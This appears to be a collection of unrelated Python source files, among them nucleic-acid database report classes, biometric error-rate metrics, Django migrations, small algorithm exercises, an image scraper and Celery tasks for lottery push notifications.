return self._report['Pair Name']
@property
def shear(self) -> float:
"""Gets advanced report structure shear
:return: shear
:rtype: float
"""
return self._report['Shear']
@property
def stretch(self) -> float:
"""Gets advanced report structure stretch
:return: stretch
:rtype: float
"""
return self._report['Stretch']
@property
def stagger(self) -> float:
"""Gets advanced report structure stagger
:return: stagger
:rtype: float
"""
return self._report['Stagger']
@property
def buckle(self) -> float:
"""Gets advanced report structure buckle
:return: buckle
:rtype: float
"""
return self._report['Buckle']
@property
def propellor(self) -> float:
"""Gets advanced report structure propellor
:return: propellor
:rtype: float
"""
return self._report['Propellor']
@property
def opening(self) -> float:
"""Gets advanced report structure opening
:return: opening
:rtype: float
"""
return self._report['Opening']
def download(self, download_type: DownloadType = DownloadType.Pdb, save: bool = False, target_dir: str = '') -> str:
"""NOT WORKS ON THIS REPORT TYPE"""
pass
class BasePairStepParameterReport(_AdvancedBaseReport):
"""Class for base pair parameter search report extending _AdvancedBaseReport"""
def __init__(self, report: dict = None):
"""Default constructor
:param report: report dict to make report (default value = None)
:type report: dict"""
super().__init__()
self._update({
'Model Number': 0,
'Step Number': 0,
'Step Name': '',
'Shift': 0,
'Slide': 0,
'Rise': 0,
'Tilt': 0,
'Roll': 0,
'Twist': 0,
'X-Displacement': 0,
'Y-Displacement': 0,
'Helical Rise': 0,
'Inclination': 0,
'Tip': 0,
'Helical Twist': 0
})
if report:
self._update(_assign_numbers(report))
@staticmethod
def report_type() -> str:
return 'bpsp'
@property
def model_num(self) -> int:
"""Gets advanced report structure model number
:return: model number
:rtype: int
"""
return self._report['Model Number']
@property
def step_num(self) -> int:
"""Gets advanced report structure step number
:return: step number
:rtype: int
"""
return self._report['Step Number']
@property
def step_name(self) -> str:
"""Gets advanced report structure step name
:return: step name
:rtype: str
"""
return self._report['Step Name']
@property
def shift(self) -> float:
"""Gets advanced report structure shift
:return: shift
:rtype: float
"""
return self._report['Shift']
@property
def slide(self) -> float:
"""Gets advanced report structure slide
:return: slide
:rtype: float
"""
return self._report['Slide']
@property
def rise(self) -> float:
"""Gets advanced report structure rise
:return: rise
:rtype: float
"""
return self._report['Rise']
@property
def tilt(self) -> float:
"""Gets advanced report structure tilt
:return: tilt
:rtype: float
"""
return self._report['Tilt']
@property
def roll(self) -> float:
"""Gets advanced report structure roll
:return: roll
:rtype: float
"""
return self._report['Roll']
@property
def x_disp(self) -> float:
"""Gets advanced report structure x displacement
:return: x displacement
:rtype: float
"""
return self._report['X-Displacement']
@property
def y_disp(self) -> float:
"""Gets advanced report structure y displacement
:return: x displacement
:rtype: float
"""
return self._report['Y-Displacement']
@property
def helical_rise(self) -> float:
"""Gets advanced report structure helical rise
:return: helical rise
:rtype: float
"""
return self._report['Helical Rise']
@property
def inclination(self) -> float:
"""Gets advanced report structure inclination
:return: inclination
:rtype: float
"""
return self._report['Inclination']
@property
def tip(self) -> float:
"""Gets advanced report structure tip
:return: tip
:rtype: float
"""
return self._report['Tip']
@property
def helical_twist(self) -> float:
"""Gets advanced report structure helical twist
:return: helical twist
:rtype: float
"""
return self._report['Helical Twist']
def download(self, download_type: DownloadType = DownloadType.Pdb, save: bool = False, target_dir: str = '') -> str:
"""NOT WORKS ON THIS REPORT TYPE"""
pass
class DescriptorReport(_AdvancedBaseReport):
"""Class for descriptor search report extending _AdvancedBaseReport"""
def __init__(self, report: dict = None):
"""Default constructor
:param report: report dict to make report (default value = None)
:type report: dict"""
super().__init__()
self._update({
'Structure Description': '',
})
if report:
self._update(report)
@staticmethod
def report_type() -> str:
return 'desc'
@property
def description(self) -> str:
"""Gets advanced report structure description
:return: description
:rtype: str
"""
return self._report['Structure Description']
def download(self, download_type: DownloadType = DownloadType.Pdb, save: bool = False, target_dir: str = '') -> str:
"""NOT WORKS ON THIS REPORT TYPE"""
pass
class SequencesReport(_AdvancedBaseReport):
"""Class for sequences search report extending _AdvancedBaseReport"""
def __init__(self, report: dict = None):
"""Default constructor
:param report: report dict to make report (default value = None)
:type report: dict"""
super().__init__()
self._update({
'NA Sequence': '',
'Structure Description': '',
})
if report:
self._update(report)
@staticmethod
def report_type() -> str:
return 'naSeq'
@property
def sequence(self) -> str:
"""Gets advanced report structure nucleic acid sequence
:return: sequence
:rtype: str
"""
return self._report['NA Sequence']
@property
def description(self) -> str:
"""Gets advanced report structure description
:return: description
:rtype: str
"""
return self._report['Structure Description']
def download(self, download_type: DownloadType = DownloadType.Pdb, save: bool = False, target_dir: str = '') -> str:
"""NOT WORKS ON THIS REPORT TYPE"""
pass
class StatisticReport(object):
"""Class for statistic search report"""
def __init__(self, report: dict = None):
"""Default constructor
:param report: report dict to make report (default value = None)
:type report: dict"""
self._stats = report
@property
def stats(self) -> dict:
"""Gets advanced report structure statistics
:return: statistics
:rtype: str
"""
return self._stats
class RNA3DBasePairRelFreqReport(_AdvancedBaseReport):
"""Class for RNA 3D Base Pair Relative Frequency Report search report extending _AdvancedBaseReport"""
def __init__(self, report: dict = None):
"""Default constructor
:param report: report dict to make report (default value = None)
:type report: dict"""
super().__init__()
self._update({
'PDB ID': '',
'Relative cWW': 0,
'Relative tWW': 0,
'Relative cWH': 0,
'Relative tWH': 0,
'Relative cWS': 0,
'Relative tWS': 0,
'Relative cHH': 0,
'Relative tHH': 0,
'Relative cHS': 0,
'Relative tHS': 0,
'Relative cSS': 0,
'Relative tSS': 0
})
if report:
self._update(_assign_numbers(report))
@staticmethod
def report_type() -> str:
return 'bpFreq'
@property
def pdb_id(self) -> str:
"""Gets advanced report structure PDB
:return: PDB ID
:rtype: str
"""
return self._report['PDB ID']
@property
def cww(self) -> float:
"""Gets advanced report relative cWW
:return: relative cWW
:rtype: float
"""
return self._report['Relative cWW']
@property
def tww(self) -> float:
"""Gets advanced report relative tWW
:return: relative tWW
:rtype: float
"""
return self._report['Relative tWW']
@property
def cwh(self) -> float:
"""Gets advanced report relative qWH
:return: relative qWH
:rtype: float
"""
return self._report['Relative cWH']
@property
def twh(self) -> float:
"""Gets advanced report relative tWH
:return: relative tWH
:rtype: float
"""
return self._report['Relative tWH']
@property
def cws(self) -> float:
"""Gets advanced report relative cWS
:return: relative cWS
:rtype: float
"""
return self._report['Relative cWS']
@property
def tws(self) -> float:
"""Gets advanced report relative tWS
:return: relative tWS
:rtype: float
"""
return self._report['Relative tWS']
@property
def chh(self) -> float:
"""Gets advanced report relative cHH
:return: relative cHH
:rtype: float
"""
return self._report['Relative cHH']
@property
def thh(self) -> float:
"""Gets advanced report relative tHH
:return: relative tHH
:rtype: float
"""
return self._report['Relative tHH']
@property
def chs(self) -> float:
"""Gets advanced report relative cHS
:return: relative cHS
:rtype: float
"""
return self._report['Relative cHS']
@property
def ths(self) -> float:
"""Gets advanced report relative tHS
:return: relative tHS
:rtype: float
"""
return self._report['Relative tHS']
@property
def css(self) -> float:
"""Gets advanced report relative cSS
:return: relative cSS
:rtype: float
"""
return self._report['Relative cSS']
@property
def tss(self) -> float:
"""Gets advanced report relative tSS
:return: relative tWS
:rtype: float
"""
return self._report['Relative tSS']
def download(self, download_type: DownloadType = DownloadType.Pdb, save: bool = False, target_dir: str = '') -> str:
"""Download PDB from NDB
:param download_type: file download type (default value is DownloadType.PDB)
:type download_type: DownloadType
:param target_dir: where to save file (default value is current dir)
:type target_dir: str
:param save: tells if file should be saved or not (default value = False)
:type save: bool
:return: string or None
:rtype: str
"""
id_structure = self.pdb_id
if not self.pdb_id:
print("No pdb_id trying ndb_id")
id_structure = self.ndb_id
return DownloadHelper.download(id_structure, download_type, save, target_dir)
class RNA3DBasePhosphateRelFreqReport(_AdvancedBaseReport):
"""Class for RNA 3D Base Phosphate Relative Frequency Report search report extending _AdvancedBaseReport"""
def __init__(self, report: dict = None):
"""Default constructor
:param report: report dict to make report (default value = None)
:type report: dict"""
super().__init__()
self._update({
'PDB ID': '',
'Relative 1BPh': 0,
'Relative 2BPh': 0,
'Relative 3BPh': 0,
'Relative 4BPh': 0,
'Relative 5BPh': 0,
'Relative 6BPh': 0,
'Relative 7BPh': 0,
'Relative 8BPh': 0,
'Relative 9BPh': 0,
'Relative 0BPh': 0
})
if report:
self._update(_assign_numbers(report))
@staticmethod
def report_type() -> str:
return 'bphsFreq'
@property
def pdb_id(self) -> str:
"""Gets advanced report structure PDB
:return: PDB ID
:rtype: str
"""
return self._report['PDB ID']
@property
def bph_1(self) -> float:
"""Gets advanced report relative 1BPh
:return: relative 1BPh
:rtype: float
"""
return self._report['Relative 1BPh']
@property
def bph_2(self) -> float:
"""Gets advanced report relative 2BPh
:return: relative 2BPh
:rtype: float
"""
return self._report['Relative 2BPh']
@property
def bph_3(self) -> float:
"""Gets advanced report relative 3BPh
:return: relative 3BPh
:rtype: float
"""
return self._report['Relative 3BPh']
@property
def bph_4(self) -> float:
"""Gets advanced report relative 4BPh
:return: relative 4BPh
:rtype: float
"""
return self._report['Relative 4BPh']
@property
def bph_5(self) -> float:
"""Gets advanced report relative 5BPh
:return: relative 5BPh
:rtype: float
"""
return self._report['Relative 5BPh']
@property
def bph_6(self) -> float:
"""Gets advanced report relative 6BPh
:return: relative 6BPh
:rtype: float
"""
return self._report['Relative 6BPh']
@property
def bph_7(self) -> float:
"""Gets advanced report relative 7BPh
:return: relative 7BPh
:rtype: float
"""
return self._report['Relative 7BPh']
@property
def bph_8(self) -> float:
"""Gets advanced report relative 8BPh
:return: relative 8BPh
:rtype: float
"""
return self._report['Relative 8BPh']
@property
def bph_9(self) -> float:
"""Gets advanced report relative 9BPh
:return: relative 9BPh
:rtype: float
"""
return self._report['Relative 9BPh']
@property
def bph_0(self) -> float:
"""Gets advanced report relative 0BPh
:return: relative 0BPh
:rtype: float
"""
return self._report['Relative 0BPh']
def download(self, download_type: DownloadType = DownloadType.Pdb, save: bool = False, target_dir: str = '') -> str:
"""Download PDB from NDB
:param download_type: file download type (default value is DownloadType.PDB)
:type download_type: DownloadType
:param target_dir: where to save file (default value is current dir)
:type target_dir: str
:param save: tells if file should be saved or not (default value = False)
:type save: bool
:return: string or None
:rtype: str
"""
id_structure = self.pdb_id
if not self.pdb_id:
print("No pdb_id trying ndb_id")
id_structure = self.ndb_id
return DownloadHelper.download(id_structure, download_type, save, target_dir)
class RNA3DBaseStackingRelFreqReport(_AdvancedBaseReport):
"""Class for RNA 3D Base Stacking Relative Frequency Report search report extending _AdvancedBaseReport"""
def __init__(self, report: dict = None):
"""Default constructor
:param report: report dict to make report (default value = None)
:type report: dict"""
super().__init__()
self._update({
'PDB ID': '',
'Relative s33': 0,
'Relative s53': 0,
'Relative s55': 0
})
if report:
self._update(_assign_numbers(report))
@staticmethod
def report_type() -> str:
return 'stackFreq'
@property
def pdb_id(self) -> str:
"""Gets advanced report structure PDB
:return: PDB ID
:rtype: str
"""
return self._report['PDB ID']
@property
def s33(self) -> float:
"""Gets advanced report structure relative s33
:return: relative s33
:rtype: float
"""
return self._report['Relative s33']
@property
def s53(self) -> float:
"""Gets advanced report structure relative s53
:return: relative s53
:rtype: float
"""
return self._report['Relative s53']
@property
def s55(self) -> float:
"""Gets advanced report structure relative s55
:return: relative s55
:rtype: float
"""
return self._report['Relative s55']
def download(self, download_type: DownloadType = DownloadType.Pdb, save: bool = False, target_dir: str = '') -> str:
"""Download PDB from NDB
:param download_type: file download type (default value is DownloadType.PDB)
:type download_type: DownloadType
:param target_dir: where to save file (default value is current dir)
:type target_dir: str
:param save: tells if file should be saved or not (default value = False)
:type save: bool
:return: string or None
:rtype: str
"""
id_structure = self.pdb_id
if not self.pdb_id:
print("No pdb_id trying ndb_id")
id_structure = self.ndb_id
return DownloadHelper.download(id_structure, download_type, save, target_dir)
class RNA3DMotifReport(_AdvancedBaseReport):
"""Class for RNA 3D Base Phosphate Relative Frequency Report search report extending _AdvancedBaseReport"""
def __init__(self, report: dict = None):
"""Default constructor
:param report: report dict to make report (default value = None)
:type report: dict"""
super().__init__()
self._update({
'PDB ID': '',
'Motif ID': '',
'Common Name': '',
'Annotation': ''
})
if report:
self._update(report)
@staticmethod
def report_type() -> str:
return 'motif'
@property
def pdb_id(self) -> str:
"""Gets advanced report structure PDB
:return: PDB ID
:rtype: str
"""
return self._report['PDB ID']
@property
def motif_id(self) -> str:
"""Gets advanced report structure motif ID
:return: motif ID
:rtype: str
"""
return self._report['Motif ID']
@property
def common_name(self) -> str:
"""Gets advanced report structure common name
:return: common name
:rtype: str
"""
return self._report['Common Name']
@property
def annotation(self) -> str:
"""Gets advanced report structure annotation
:return: annotation
:rtype: str
"""
return self._report['Annotation']
def download(self, download_type: DownloadType = DownloadType.Pdb, save: bool = False, target_dir: str = '') -> str:
"""Download PDB from NDB
:param download_type: file download type (default value is DownloadType.PDB)
:type download_type: DownloadType
:param target_dir: where to save file (default value is current dir)
:type target_dir: str
:param save: tells if file should be saved or not (default value = False)
:type save: bool
:return: string or None
:rtype: str
"""
id_structure = self.pdb_id
if not self.pdb_id:
print("No pdb_id trying ndb_id")
id_structure = self.ndb_id
return DownloadHelper.download(id_structure, download_type, save, target_dir)
AdvancedReport = TypeVar('AdvancedReport', NDBStatusReport, CellDimensionsReport, CitationReport, RefinementDataReport,
NABackboneTorsionReport, BasePairParameterReport, BasePairStepParameterReport,
DescriptorReport, SequencesReport, StatisticReport, RNA3DBasePairRelFreqReport,
RNA3DBasePhosphateRelFreqReport, RNA3DBaseStackingRelFreqReport, RNA3DMotifReport)
|
import numpy as np
def compute_frr_far(data, data_class_labels, threshold):
false_rejected_list = []
false_accepted_list = []
for i in range(len(data)):
accepted = np.zeros_like(data[i])
accepted[data[i] > threshold] = 1
genuine_indexes = np.array(data_class_labels == data_class_labels[i])
false_rejected = 1 - (accepted[genuine_indexes == True].sum() / (len(accepted[genuine_indexes == True]) - 1))
false_accepted = accepted[genuine_indexes == False].sum() / len(accepted[genuine_indexes == False])
false_rejected_list.append(false_rejected)
false_accepted_list.append(false_accepted)
cur_frr = np.array(false_rejected_list).mean() * 100
cur_far = np.array(false_accepted_list).mean() * 100
return cur_frr, cur_far
def compute_frr_at_far_points(list_frr, list_far):
frr_at_01 = None
frr_at_1 = None
frr_at_10 = None
list_frr_r = list(reversed(list_frr))
list_far_r = list(reversed(list_far))
for i in range(len(list_frr_r)):
if list_far_r[i] >= 0.1 and frr_at_01 is None:
frr_at_01 = list_frr_r[i]
if list_far_r[i] >= 1 and frr_at_1 is None:
frr_at_1 = list_frr_r[i]
if list_far_r[i] >= 10 and frr_at_10 is None:
frr_at_10 = list_frr_r[i]
break
return frr_at_01, frr_at_1, frr_at_10
def find_eer(data, data_class_labels):
frr_list = []
far_list = []
min_difference = np.inf
eer_threshold = 0
eer_threshold_index = 0
count = 0
for threshold in np.arange(0, 1, 0.001):
cur_frr, cur_far = compute_frr_far(data, data_class_labels, threshold)
frr_list.append(cur_frr)
far_list.append(cur_far)
if np.abs(cur_frr - cur_far) <= min_difference:
min_difference = np.abs(cur_frr - cur_far)
eer_threshold = threshold
eer_threshold_index = count
count += 1
return frr_list, far_list, eer_threshold_index, eer_threshold
def get_scores(data, data_class_labels):
genuine_scores_list = None
impostor_scores_list = None
for i in range(len(data)):
genuine_indexes = np.array(data_class_labels == data_class_labels[i])
genuine_scores = data[i][genuine_indexes == True]
genuine_scores = genuine_scores[~np.isnan(genuine_scores)]
impostor_scores = data[i][genuine_indexes == False]
genuine_scores_list = genuine_scores if genuine_scores_list is None else np.append(genuine_scores_list, genuine_scores)
impostor_scores_list = impostor_scores if impostor_scores_list is None else np.append(impostor_scores_list, impostor_scores)
return genuine_scores_list, impostor_scores_list
|
"""
Estrutura:
while {condição}:
comandos
# opcional para interrupção
if condicao
break
É possível usar usar "else", que será executado uma vez
"""
# Exemplo equivalente a 'for c in range(1,10), porém irá printar tb o 10 por causa do "else":'
c = 1
while c < 10:
print(c)
c += 1
else:
print(c)
print('Fim')
# Exemplo com limite desconhecido
r = 'S'
while r == 'S':
n = int(input('Digite um valor: '))
r = input('Deseja continuar (S/N)? ').strip().upper()
print('Fim')
|
from collections import defaultdict
def onlyOneZero(grid):
zeroes = 0
for row in grid:
zeroes += row.count(0)
return zeroes == 1
def buildColorDict(n, grid):
M = defaultdict(int)
for row in grid:
for cell in row:
M[cell] += 1
return M
def buildShapeDict(n, grid):
M = defaultdict(list)
for y, row in enumerate(grid):
for x, cell in enumerate(row):
M[cell].append((x, y))
return M
def isCorner(cells):
c0 = cells[0]
c1 = cells[1]
c2 = cells[2]
X = 0
Y = 1
# OO
# O.
if (
c0[X] == (c1[X] - 1)
and c0[Y] == c1[Y]
and c0[X] == c2[X]
and c0[Y] == (c2[Y] - 1)
):
return True
# OO
# .O
if (
c0[X] == (c1[X] - 1)
and c0[Y] == c1[Y]
and c1[X] == c2[X]
and c1[Y] == (c2[Y] - 1)
):
return True
# .O
# OO
if (
c1[X] == (c2[X] - 1)
and c1[Y] == c2[Y]
and c0[X] == c2[X]
and c0[Y] == (c2[Y] - 1)
):
return True
# O.
# OO
if (
c0[X] == c1[X]
and c0[Y] == (c1[Y] - 1)
and c1[X] == (c2[X] - 1)
and c1[Y] == c2[Y]
):
return True
return False
if __name__ == "__main__":
n = int(input())
grid = []
for i in range(2**n):
grid.append(list(map(int, input().split())))
M = buildColorDict(n, grid)
oneZero = M[0] == 1
allThree = True
for i in range(1, ((4**n) - 1) // 3 + 1):
if M[i] != 3:
allThree = False
break
if oneZero and allThree:
Mshape = buildShapeDict(n, grid)
allCorner = True
for i in range(1, ((4**n) - 1) // 3 + 1):
if not isCorner(Mshape[i]):
allCorner = False
break
if allCorner:
print(1)
else:
print(0)
else:
print(0)
|
import os
from urllib.parse import urlparse
from bs4 import BeautifulSoup
import requests
r=requests.get('http://www.xiachufang.com/')
soup=BeautifulSoup(r.text)
#print(soup)
#print(soup.select('img'))
img_list=[]
for img in soup.select('img'):
if img.has_attr('data-src'):
img_list.append(img.attrs['data-src'])
else:
img_list.append(img.attrs['src'])
#倒数两个是新浪图标
img_list=img_list[0:-2]
#print(img_list)
#初始化下载文件目录
img_dir=os.path.join(os.curdir,'images')
if not os.path.isdir(img_dir):
os.mkdir(img_dir)
for img in img_list:
o=urlparse(img)
filename=o.path[1:].split('@')[0]
filepath=os.path.join(img_dir,filename)
url='%s://%s/%s'%(o.scheme,o.netloc,filename)
print(url)
res=requests.get(url)
with open(filepath,'wb') as f:
for chunk in res.iter_content(1024):
f.write(chunk)
#linux下一行命令爬取照片
#curl -s http://www.xiachufang.com/|grep -oP '(?<=src=\")http://i2\.chuimg\.com/\.jpg'|xargs -i curl --create-dir {} -o ./image/{} |
# Generated by Django 2.1.4 on 2019-01-04 20:01
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('speciality', '0010_auto_20190104_2001'),
('services', '0001_initial'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Psychologues',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('avatar', models.ImageField(upload_to='static/media/')),
('phone', models.CharField(blank=True, max_length=10)),
('fax', models.CharField(blank=True, max_length=10)),
('bio', models.TextField(blank=True, max_length=700)),
('education', models.CharField(blank=True, max_length=70)),
('services', models.ManyToManyField(blank=True, to='services.Service')),
('specialities', models.ManyToManyField(blank=True, to='speciality.SpecialityDetail')),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
from django.contrib import admin
from .models import Victim
# Register your models here.
admin.site.register(Victim) |
class Solution:
def reverse(self, x: int):
signe = [1,-1][x < 0]
x = x*signe
x = int(str(x)[::-1])
return x*signe*(x < 2**31)
examples = [123, -123, 120, 0]
for example in examples:
print(Solution().reverse(example)) |
a, b = map(int, input().split())
print(int((b-a)*(b-a-1)/2 - a))
|
class Node:
def __init__(self,data):
self.left = None
self.right = None
self.data = data
class BST:
def __init__(self):
self.root = None
def set_root(self,data):
self.root = Node(data)
def insert_node(self,data):
if self.root is None:
self.set_root(data)
else:
n = Node(data)
troot = self.root
while troot:
if data < troot.data:
if troot.left:
troot = troot.left
else:
troot.left = n
break
else:
if troot.right:
troot = troot.right
else:
troot.right = n
break
def search_node(self,data):
if self.root is None:
return "Not found"
else:
troot = self.root
while troot:
if data < troot.data:
if troot.left:
troot = troot.left
if troot.data == data:
return "Found"
else:
return "Not found"
elif data > troot.data:
if troot.right:
troot = troot.right
if troot.data == data:
return "Found"
else:
return "Not found"
else:
return "Found"
def lowestCommonAncestor(self, root: 'Node', p: 'Node', q: 'Node') -> 'Node':
while (root.data - p.data) * (root.data - q.data) > 0:
root = (root.left, root.right)[p.data > root.data]
return root
def search(self, value):
"""
Value will be to the left of node if node > value; right otherwise.
"""
node = self.root
while node is not None:
if node.data == value:
return node # node.value
if node.data > value:
node = node.left
else:
node = node.right
return False
""" tree = BST()
done = False
while done == False :
user = input("Enter a value to add to bst or 'lca': ")
if(user != "lca"):
tree.insert_node(int(user))
else:
value1 = int(input("Enter the first value: "))
value2 = int(input("Enter the second value: "))
node1 = tree.search(value1)
node2 = tree.search(value2)
print("The lowest common ancestor of these values is: " )
print(tree.lowestCommonAncestor(tree.root, node1, node2).data)
done = True """
""" tree.insert_node(7)
tree.insert_node(3)
tree.insert_node(8)
tree.insert_node(12)
tree.insert_node(1)
tree.insert_node(9)
tree.insert_node(4)
tree.insert_node(6)
value1 = int(input("Enter the first value: "))
value2 = int(input("Enter the second value: "))
node1 = tree.search(value1)
node2 = tree.search(value2)
print(tree.lowestCommonAncestor(tree.root, node1, node2).data) """
|
#!/usr/bin/env python
"""
Convert clustal alignment files to grishin for use in rosetta
Author: Ed van Bruggen <edvb@uw.edu>
"""
import sys
import argparse
from argparse import RawTextHelpFormatter
parser = argparse.ArgumentParser(description=__doc__, formatter_class=RawTextHelpFormatter)
parser.add_argument('--file', type=str, required=True,
help='input clustal alignment file')
parser.add_argument('--target', metavar='POS', type=int, default=1,
help='position of target protein (default: 1)')
args = parser.parse_args()
aln = open(args.file)
proteins = []
for i, line in enumerate(aln):
if i == 0 or line == '\n' or line[0] == ' ':
continue
words = line.split()
skip = 0
for protein in proteins:
if protein[0] == words[0]:
protein[1] += words[1]
skip = 1
continue
if not skip:
proteins.append([words[0], words[1]])
target = proteins[args.target - 1]
for protein in proteins:
if protein == target:
continue
grishin = open(target[0] + "_" + protein[0] + ".grishin", "w")
grishin.write("## %s %s_thread\n#\nscores from program: 0\n0 %s\n0 %s\n" %
(target[0], protein[0], target[1], protein[1]))
|
from time import sleep
from features.clock import Clock
from field import Field
from multiply import multiply
from painter import Led_Matrix_Painter, RGB_Field_Painter
from rainbow import rainbowcolors
class Rainbowclock(Clock):
def __init__(self, field_leds: Field, field_matrix: Field, rgb_field_painter: RGB_Field_Painter,
led_matrix_painter: Led_Matrix_Painter):
super(Rainbowclock, self).__init__(field_leds, field_matrix, rgb_field_painter, led_matrix_painter)
self.COLORS = 60
self.r = rainbowcolors(self.COLORS + 20, (self.COLORS + 20) / self.COLORS)
self.currentrainbowstart = 0
def tick(self):
self.led_matrix_painter.show_Text(self.get_date_string())
back = Field(10, 20)
self.currentrainbowstart += 1
self.currentrainbowstart %= self.COLORS
for x in range(10):
for y in range(20):
back.set_pixel(x, y, self.r[y + self.currentrainbowstart])
self.draw_clock([255, 255, 255])
rainbowtime = multiply(back, self.field_leds)
self.rgb_field_painter.draw(rainbowtime)
sleep(0.05)
|
../_rostf.py |
# Generated by Django 2.2.3 on 2019-11-06 15:17
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('product', '0002_auto_20191106_0907'),
]
operations = [
migrations.RemoveField(
model_name='product',
name='description',
),
migrations.RemoveField(
model_name='product',
name='image',
),
migrations.AlterField(
model_name='product',
name='product',
field=models.CharField(blank=True, default='Pomodoro', max_length=60, null=True),
),
]
|
import sys
import os
path = str(sys.argv[0])
if os.path.exists(path):
tree = os.listdir(path)
print(tree)
else:
print("This path is not real! Try another path!")
|
import random
import datetime
from celery.task import PeriodicTask, task
from celery.schedules import crontab
from yoolotto.util.async import report_errors
from yoolotto.lottery.models import LotteryCountryDivision
class UpdateDraws(PeriodicTask):
run_every = datetime.timedelta(minutes=30)
@report_errors
def run(self, **kwargs):
from yoolotto.lottery.feed.draw_common_importer import LotteryCommonDrawImporter,\
CommonDrawDataProvider
from yoolotto.lottery.feed.winning_common_importer import LotteryCommonWinningImporter,\
CommonWinningDataProvider
lcdi=LotteryCommonDrawImporter(CommonDrawDataProvider.remote)
lcdi.run()
lcwi=LotteryCommonWinningImporter(CommonWinningDataProvider.remote)
lcwi.run()
#specially taken for sending to iphone, integer instead of remote_id
state_codes={
"TX":0,
"CA":2,
"AZ":3,
"AR":4,
"CO":5,
"CT":6,
"DE":7,
"DC":8,
"FL":9,
"GA":10,
"ID":11,
"IL":12,
"IN":13,
"IA":14,
"KS":15,
"KY":16,
"LA":17,
"ME":18,
"MD":19,
"MA":20,
"MI":21,
"MN":22,
"MO":23,
"MT":24,
"NE":25,
"NH":26,
"NJ":27,
"NM":28,
"NY":29,
"NC":30,
"ND":31,
"OH":32,
"OK":33,
"OR":34,
"PA":35,
"RI":36,
"SC":37,
"SD":38,
"TN":39,
"VT":40,
"VA":41,
"WA":42,
"WI":43,
"WV":44,
"WY":45
}
@task
@report_errors
def notify_draw_result_all(draw_id):
from yoolotto.lottery.models import LotteryTicket
for _id in set([x["pk"] for x in LotteryTicket.objects.filter(
draw_id=int(draw_id), submissions__checked=False, notified=False).values("pk")]):
notify_draw_result_for_ticket.apply_async(countdown=random.randrange(30),
kwargs={"ticket_id": _id})
@task
@report_errors
def notify_draw_result_for_ticket(ticket_id):
from yoolotto.lottery.models import LotteryTicket
from yoolotto.communication.apn import APNSender
from yoolotto.communication.gcm_sender import GCMSender
try:
ticket = LotteryTicket.objects.get(pk=int(ticket_id))
except:
return
if not ticket.user.preferences.jackpot_drawing:
return
log = ""
log += "\nTicket: " + str(ticket.pk)
text = "Results available for %s" % ticket.draw.component.name
log += "\n" + text
for device in ticket.user.devices.all():
if not device.device_token:
log += "\nSkipped Device, No Token"
continue
if device.is_ios():
apn = APNSender(device.device_token, text=text,
custom={"code": "draw", "drawId": ticket.draw.pk,"state":state_codes[ticket.division.remote_id]})
apn.send()
log += "\nAPN Outbound: %s" % device.device_token
elif device.is_android():
gcm = GCMSender(to=[device.device_token], data={"text": text,
"code": "draw", "drawId": ticket.draw.pk,"state":ticket.division.remote_id,"ticket_id":ticket.id
})
gcm.send()
log += "\nGCM Outbound: %s" % device.device_token
ticket.notified = True
ticket.save()
return log
class FrenzyDailyNotification(PeriodicTask):
run_every = datetime.timedelta(minutes=20)
#run_every = crontab(minute="5", hour="18")
@report_errors
def run(self, **kwargs):
from yoolotto.lottery.models import LotteryDraw
candidates = LotteryDraw.objects.filter(
jackpot__gte=75000000, official=True, result__isnull=True,
date__gte=datetime.date.today())
print "Candidates:", candidates
for candidate in candidates:
frenzy = candidate.frenzies.filter(
added_at__gte=datetime.datetime.now()-datetime.timedelta(hours=18))
if frenzy:
continue
if candidate.date != datetime.date.today():
continue
notify_frenzy_all.apply_async(countdown=5, kwargs={"draw_id": candidate.pk})
@task
@report_errors
def notify_frenzy_all(draw_id):
from yoolotto.lottery.enumerations import EnumerationManager
from yoolotto.lottery.models import LotteryDraw, LotteryDrawFrenzy
from yoolotto.user.models import YooLottoUser
draw = LotteryDraw.objects.get(pk=int(draw_id))
if draw.jackpot < 75000000:
return
draw.frenzied = True
draw.save()
frenzy = LotteryDrawFrenzy(draw=draw)
frenzy.save()
# print "TESTING", draw, frenzy
# return
component_name = draw.component.name
draw_value = "{:,}".format(draw.jackpot)
game_type = EnumerationManager.game_reverse(draw.component.parent.pk)
for user in YooLottoUser.objects.filter(preferences__jackpot_frenzy=True).values("pk"):
notify_frenzy_for_user.apply_async(countdown=random.randrange(60),
kwargs={"component_name": component_name, "draw_value": draw_value,
"game_type": game_type, "user_id": user["pk"],"draw_id":draw_id})
@task
@report_errors
def notify_frenzy_for_user(component_name, draw_value, game_type,user_id,draw_id):
from yoolotto.lottery.models import LotteryDraw
from yoolotto.user.models import YooLottoUser
from yoolotto.communication.apn import APNSender
from yoolotto.communication.gcm_sender import GCMSender
state=LotteryDraw.objects.get(id=draw_id).division.remote_id
# reducing multiple frenzies notification for any user ,
# based on user old hits for states in history
# and also sending duplicate notification for state TX and game_type in 0/1 Megamillion/Powerball
old_states=[str(_state) for _state in set(YooLottoUser.objects.get(id=user_id).tickets.values_list('division__remote_id',flat=True))]
send_for_states=[]
log=""
if (not old_states and state=="TX"):
send_for_states.append("TX")
elif (state in old_states):
send_for_states.append(state)
else:
log += "\nDevice auto skipped ,assume unnecessary state: %s" % state
if old_states and state=="TX" and game_type in [0,1]: # 0/Megamillion(TX),1/Powerball(TX):
#send duplicate notification for state that user has already played
[send_for_states.append(i) for i in old_states if i!="CA"]
send_for_states=list(set(send_for_states))
for _index,right_state in enumerate(send_for_states):#loop for duplicate notification
if right_state!="TX" and len(send_for_states) > 1:
log += "\n Send duplicate notification for state: %s" % right_state
user = YooLottoUser.objects.get(pk=int(user_id))
log += "\nUser: " + str(user.pk)
state_name=LotteryCountryDivision.objects.get(remote_id=right_state).name.title()
text = "%s %s Jackpot is %s!" % (state_name,component_name, draw_value)
log += "\n" + text
for device in user.devices.all():
if not device.device_token:
log += "\nSkipped Device, No Token"
continue
if device.is_ios():
apn = APNSender(device.device_token, text=text,
custom={"code": "frenzy", "gameType": game_type,
"state":state_codes[right_state],
"drawId":draw_id
})
apn.send()
log += "\nAPN Outbound: %s" % device.device_token
elif device.is_android():
gcm = GCMSender(to=[device.device_token], data={"text": text,
"code": "frenzy", "gameType": game_type,
"state":right_state,
"draw_id":draw_id+_index
})
